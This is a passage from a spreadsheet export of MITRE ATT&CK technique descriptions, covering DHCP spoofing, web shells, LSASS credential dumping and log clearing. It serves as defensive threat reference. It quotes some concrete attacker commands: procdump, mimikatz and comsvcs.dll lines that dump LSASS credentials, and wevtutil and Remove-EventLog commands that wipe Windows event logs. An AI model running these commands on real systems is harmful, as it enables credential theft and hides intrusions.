    <t>Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages.
https://attack.mitre.org/techniques/T1491</t>
  </si>
  <si>
    <t>T1535</t>
  </si>
  <si>
    <t>Unused/Unsupported Cloud Regions</t>
  </si>
  <si>
    <t>Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.
Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.
A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.
An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)
https://attack.mitre.org/techniques/T1535</t>
  </si>
  <si>
    <t>T1557.003</t>
  </si>
  <si>
    <t>DHCP Spoofing</t>
  </si>
  <si>
    <t>Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.(Citation: rfc2131) The typical server-client interaction is as follows: 
1. The client broadcasts a `DISCOVER` message.
2. The server responds with an `OFFER` message, which includes an available network address. 
3. The client broadcasts a `REQUEST` message, which includes the network address offered. 
4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters.
Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.(Citation: new_rogue_DHCP_serv_malware)(Citation: w32.tidserv.g) Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.
DHCPv6 clients can receive network configuration information without being assigned an IP address by sending a &lt;code&gt;INFORMATION-REQUEST (code 11)&lt;/code&gt; message to the &lt;code&gt;All_DHCP_Relay_Agents_and_Servers&lt;/code&gt; multicast address.(Citation: rfc3315) Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.
Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool.
https://attack.mitre.org/techniques/T1557/003</t>
  </si>
  <si>
    <t>T1563</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking</t>
  </si>
  <si>
    <t>Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.
Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)
https://attack.mitre.org/techniques/T1563</t>
  </si>
  <si>
    <t>T1027.001</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. 
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)
https://attack.mitre.org/techniques/T1027/001</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)
In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)
https://attack.mitre.org/techniques/T1505/003</t>
  </si>
  <si>
    <t>T1484.001</t>
  </si>
  <si>
    <t>Group Policy Modification</t>
  </si>
  <si>
    <t>Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) 
Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.
Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)
For example, publicly available scripts such as &lt;code&gt;New-GPOImmediateTask&lt;/code&gt; can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml&lt;/code&gt;.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf&lt;/code&gt;, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)
https://attack.mitre.org/techniques/T1484/001</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t>Browser Information Discovery</t>
  </si>
  <si>
    <t>Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
Browser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.
Specific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)
https://attack.mitre.org/techniques/T1217</t>
  </si>
  <si>
    <t>T1552.004</t>
  </si>
  <si>
    <t>Private Keys</t>
  </si>
  <si>
    <t>Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. 
Adversaries may also look in common key directories, such as &lt;code&gt;~/.ssh&lt;/code&gt; for SSH keys on * nix-based systems or &lt;code&gt;C:&amp;#92;Users&amp;#92;(username)&amp;#92;.ssh&amp;#92;&lt;/code&gt; on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
When a device is registered to Entra ID, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)
On network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) 
Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.
https://attack.mitre.org/techniques/T1552/004</t>
  </si>
  <si>
    <t>T1583.004</t>
  </si>
  <si>
    <t>Server</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), enabling [Phishing](https://attack.mitre.org/techniques/T1566) operations, or facilitating [Command and Control](https://attack.mitre.org/tactics/TA0011). Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused.(Citation: Free Trial PurpleUrchin)(Citation: Freejacked) 
Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)
https://attack.mitre.org/techniques/T1583/004</t>
  </si>
  <si>
    <t>T1021.006</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM  can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)
https://attack.mitre.org/techniques/T1021/006</t>
  </si>
  <si>
    <t>T1011.001</t>
  </si>
  <si>
    <t>Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.
https://attack.mitre.org/techniques/T1011/001</t>
  </si>
  <si>
    <t>T1078.001</t>
  </si>
  <si>
    <t>Default Accounts</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)
https://attack.mitre.org/techniques/T1078/001</t>
  </si>
  <si>
    <t>T1547.003</t>
  </si>
  <si>
    <t>Time Providers</t>
  </si>
  <si>
    <t>Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\`.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by creating a new arbitrarily named subkey  pointing to a malicious DLL in the `DllName` value. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)
https://attack.mitre.org/techniques/T1547/003</t>
  </si>
  <si>
    <t>T1546.005</t>
  </si>
  <si>
    <t>Trap</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The &lt;code&gt;trap&lt;/code&gt; command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like &lt;code&gt;ctrl+c&lt;/code&gt; and &lt;code&gt;ctrl+d&lt;/code&gt;.
Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)
https://attack.mitre.org/techniques/T1546/005</t>
  </si>
  <si>
    <t>T1574.006</t>
  </si>
  <si>
    <t>Dynamic Linker Hijacking</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as &lt;code&gt;LD_PRELOAD&lt;/code&gt; on Linux or &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)
On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the &lt;code&gt;export&lt;/code&gt; command, &lt;code&gt;setenv&lt;/code&gt; function, or &lt;code&gt;putenv&lt;/code&gt; function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s &lt;code&gt;os.environ&lt;/code&gt;.
On Linux, adversaries may set &lt;code&gt;LD_PRELOAD&lt;/code&gt; to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. &lt;code&gt;LD_PRELOAD&lt;/code&gt; can be set via the environment variable or &lt;code&gt;/etc/ld.so.preload&lt;/code&gt; file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by &lt;code&gt;LD_PRELOAD&lt;/code&gt; are loaded and mapped into memory by &lt;code&gt;dlopen()&lt;/code&gt; and &lt;code&gt;mmap()&lt;/code&gt; respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) 
On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass)
https://attack.mitre.org/techniques/T1574/006</t>
  </si>
  <si>
    <t>T1136.001</t>
  </si>
  <si>
    <t>Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. 
For example, with a sufficient level of access, the Windows &lt;code&gt;net user /add&lt;/code&gt; command can be used to create a local account. On macOS systems the &lt;code&gt;dscl -create&lt;/code&gt; command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as &lt;code&gt;username&lt;/code&gt;, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
https://attack.mitre.org/techniques/T1136/001</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>Communication Through Removable Media</t>
  </si>
  <si>
    <t>Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.(Citation: ESET Sednit USBStealer 2014) Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.
https://attack.mitre.org/techniques/T1092</t>
  </si>
  <si>
    <t>T1070.001</t>
  </si>
  <si>
    <t>Clear Windows Event Logs</t>
  </si>
  <si>
    <t>Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
With administrator privileges, the event logs can be cleared with the following utility commands:
* &lt;code&gt;wevtutil cl system&lt;/code&gt;
* &lt;code&gt;wevtutil cl application&lt;/code&gt;
* &lt;code&gt;wevtutil cl security&lt;/code&gt;
These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command &lt;code&gt;Remove-EventLog -LogName Security&lt;/code&gt; to delete the Security EventLog and after reboot, disable future logging.  Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)
Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\Windows\System32\winevt\logs\`.
https://attack.mitre.org/techniques/T1070/001</t>
  </si>
  <si>
    <t>T1585.002</t>
  </si>
  <si>
    <t>Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Establishing email accounts may also allow adversaries to abuse free services – such as trial periods – to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for follow-on purposes.(Citation: Free Trial PurpleUrchin)
Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)
To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)
https://attack.mitre.org/techniques/T1585/002</t>
  </si>
  <si>
    <t>T1557.001</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning and SMB Relay</t>
  </si>
  <si>
    <t>By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. 
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)
Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords.
In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. 
Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)
https://attack.mitre.org/techniques/T1557/001</t>
  </si>
  <si>
    <t>T1222</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior)
https://attack.mitre.org/techniques/T1222</t>
  </si>
  <si>
    <t>T1003.001</t>
  </si>
  <si>
    <t>LSASS Memory</t>
  </si>
  <si>
    <t>Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* &lt;code&gt;procdump -ma lsass.exe lsass_dump&lt;/code&gt;
Locally, mimikatz can be run using:
* &lt;code&gt;sekurlsa::Minidump lsassdump.dmp&lt;/code&gt;
* &lt;code&gt;sekurlsa::logonPasswords&lt;/code&gt;
Built-in Windows tools such as `comsvcs.dll` can also be used:
* &lt;code&gt;rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full&lt;/code&gt;(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Similar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)
Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages&lt;/code&gt; and &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages&lt;/code&gt;. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
https://attack.mitre.org/techniques/T1003/001</t>
  </si>
  <si>
    <t>T1595</t>
  </si>
  <si>
    <t>Active Scanning</t>
  </si>
  <si>
    <t>Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
https://attack.mitre.org/techniques/T1595</t>
  </si>
  <si>
    <t>T1548</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism</t>
  </si>
  <si>
    <t>Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)
https://attack.mitre.org/techniques/T1548</t>
  </si>
  <si>
    <t>T1134.002</t>
  </si>
  <si>
    <t>Create Process with Token</t>
  </si>
  <si>
    <t>Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and &lt;code&gt;runas&lt;/code&gt;.(Citation: Microsoft RunAs)
Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process.
While this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.
https://attack.mitre.org/techniques/T1134/002</t>
  </si>
  <si>
    <t>T1548.001</t>
  </si>
  <si>
    <t>Setuid and Setgid</t>
  </si>
  <si>
    <t>An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The &lt;code&gt;chmod&lt;/code&gt; command can set these bits with bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;. This will enable the setuid bit. To enable the setgid bit, &lt;code&gt;chmod 2775&lt;/code&gt; and &lt;code&gt;chmod g+s&lt;/code&gt; can be used.
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.
